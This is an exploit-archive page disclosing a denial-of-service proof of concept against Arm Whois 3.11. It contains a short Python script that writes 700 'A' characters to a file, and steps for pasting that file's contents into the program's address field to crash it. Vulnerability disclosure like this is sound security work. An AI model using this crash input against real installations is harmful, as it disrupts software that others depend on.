Arm Whois 3.11 Denial of Service (PoC)

2018.11.01

Credit: Yair Rodríguez Aparicio

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC)
# Date: 2018-10-31
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Profesional Español SP3 x86
# Steps to Produce the Crash:
# 1.- Run python code : python whois.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- Crashed!
buffer = "\x41" * 700
f = open("text.txt", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Arm Whois 3.11 Denial of Service (PoC)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.